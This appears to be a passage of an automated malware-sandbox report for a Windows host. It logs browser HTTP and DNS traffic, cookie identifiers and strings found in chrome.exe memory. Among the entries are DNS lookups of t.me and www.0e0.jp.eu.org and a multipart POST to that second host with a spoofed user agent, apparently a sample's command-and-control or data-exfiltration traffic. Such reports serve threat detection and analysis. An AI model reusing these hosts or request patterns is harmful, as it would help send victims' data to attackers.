sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=B298872B9808410FAD3FCE25355C5981.RefC=2025-02-19T20:03:12Z; USRLOC=; MUID=33005DC6DCF769042869485EDD95682F; MUIDB=33005DC6DCF769042869485EDD95682F; _EDGE_S=F=1&SID=2BCFFE29921562AE14CDEBB1931A6379; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /crx/blobs/ASuc5ohcoRYyASTWkAI21BvR0f-Aos7pzgW3GtD8ImYoX-O9Pl77join3GT-5wpD1vT_nG6xpJ0eds7JOZacv0OYNfBAee3mKSnMDx3-YDnz3J7UxfHM_wfhsyHz9Z8rajAAxlKa5T9frrLlN0KHGfJRu7Y7NseNtZ_M/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.f30eb488fb3069c7561f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.39007c943b2990f579fb.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.ed9d21da82a1985cae06.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.bebeb6ab0d8626a41ee0.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b?rn=1739995396296&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=33005DC6DCF769042869485EDD95682F&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1739995396296&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b298872b9808410fad3fce25355c5981&activityId=b298872b9808410fad3fce25355c5981&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=33005DC6DCF769042869485EDD95682F; _EDGE_S=F=1&SID=2BCFFE29921562AE14CDEBB1931A6379; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /b2?rn=1739995396296&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=33005DC6DCF769042869485EDD95682F&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=102ef64d022720950de65fc1739995398; XID=102ef64d022720950de65fc1739995398
Source: global traffic	HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: /Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":9,"imageId":"AA12sf7A","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=B298872B9808410FAD3FCE25355C5981.RefC=2025-02-19T20:03:12Z; USRLOC=; MUID=33005DC6DCF769042869485EDD95682F; MUIDB=33005DC6DCF769042869485EDD95682F; _EDGE_S=F=1&SID=2BCFFE29921562AE14CDEBB1931A6379; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=fcf29717-1683-4492-8bd4-7f362ae6fd68; ai_session=r3CJqXRannGirUrtIgKfG4\|1739995396289\|1739995396289; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=B298872B9808410FAD3FCE25355C5981.RefC=2025-02-19T20:03:12Z
Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 3.35sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 300sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=B298872B9808410FAD3FCE25355C5981.RefC=2025-02-19T20:03:12Z; USRLOC=; MUID=33005DC6DCF769042869485EDD95682F; MUIDB=33005DC6DCF769042869485EDD95682F; _EDGE_S=F=1&SID=2BCFFE29921562AE14CDEBB1931A6379; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=fcf29717-1683-4492-8bd4-7f362ae6fd68; ai_session=r3CJqXRannGirUrtIgKfG4\|1739995396289\|1739995396289; sptmarket_restored=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=B298872B9808410FAD3FCE25355C5981.RefC=2025-02-19T20:03:12Z
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1739995396296&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b298872b9808410fad3fce25355c5981&activityId=b298872b9808410fad3fce25355c5981&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CA202814465D4A5997A42BDA463D968E&MUID=33005DC6DCF769042869485EDD95682F HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=33005DC6DCF769042869485EDD95682F; _EDGE_S=F=1&SID=2BCFFE29921562AE14CDEBB1931A6379; _EDGE_V=1; SM=T

Source: chrome.exe, 00000008.00000003.2516721559.000031B802DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 1www.youtube.com/Q equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000003.2521468790.000031B802DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2536260760.000031B802DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516721559.000031B802DD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000003.2518537852.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2519227877.000031B803108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2519153814.000031B803158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000008.00000003.2518537852.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2519227877.000031B803108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2519153814.000031B803158000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000008.00000002.2612096433.000031B803DE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2612096433.000031B803DE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/) equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000003.2516721559.000031B802DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2608426686.000031B802F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2612279319.000031B803E4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2555316743.000031B803E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2612279319.000031B803E4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2555316743.000031B803E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytcaogl equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000003.2516721559.000031B802DD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2603120265.000031B80275C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607803539.000031B802ED4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2608426686.000031B802F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2602925223.000031B802700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2612052483.000031B803D88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2602925223.000031B802700000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html( equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2603313878.000031B80278C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlfjf equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2612052483.000031B803D88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2607169345.000031B802DC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2607106625.000031B802D84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000008.00000002.2601240947.000031B8023D4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: www.0e0.jp.eu.org
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: ntp.msn.com
Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global traffic	DNS traffic detected: DNS query: c.msn.com
Source: global traffic	DNS traffic detected: DNS query: assets.msn.com
Source: global traffic	DNS traffic detected: DNS query: api.msn.com
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ln7ym79ri58qqi5phdbsUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0Host: www.0e0.jp.eu.orgContent-Length: 256Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 280Expires: Wed, 19 Feb 2025 20:04:15 GMTDate: Wed, 19 Feb 2025 20:04:15 GMTConnection: closePMUSER_FORMAT_QS: X-CDN-TraceId: 0.f80d7b5c.1739995393.2e4d71b2Access-Control-Allow-Headers: *Access-Control-Allow-Credentials: falseAccess-Control-Allow-Methods: GET, OPTIONS, POSTAccess-Control-Allow-Origin: *

Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 00000008.00000003.2515112294.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516570090.000031B8025A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.2516610994.000031B802C80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2607385686.000031B802E2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
